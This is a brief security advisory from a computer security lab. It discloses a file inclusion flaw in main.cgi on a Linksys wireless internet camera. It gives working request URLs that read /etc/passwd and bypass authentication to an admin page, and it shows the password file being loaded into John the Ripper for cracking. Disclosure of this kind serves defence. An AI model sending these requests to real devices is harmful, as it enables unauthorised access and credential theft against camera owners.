----------------------------------
Telconinjas Computer Security Lab

Contact: sf@cicsos.dk
				 
Severity: Low			 
				 
Vendor: Linksys			 
----------------------------------

Affected Products: Linksys Wireless Internet Camera (Version 2.12 was the 
only testbed available, though I am sure other versions near this revision number are 
vulnerable.)

Summary: The Linksys Camera has a file inclusion vulnerability in main.cgi 
leading to exposure of sensative data and bypassing authentication.

-----------------------
File Inclusion Example:
-----------------------

http://<target>:1024/main.cgi?next_file=/etc/passwd

bash-2.05b# ./john passwd
Loaded 1 password (Standard DES [24/32 4K])

-------------------------
Bypassing Authentication:
-------------------------

http://<target>:1024/main.cgi?next_file=adm/system.htm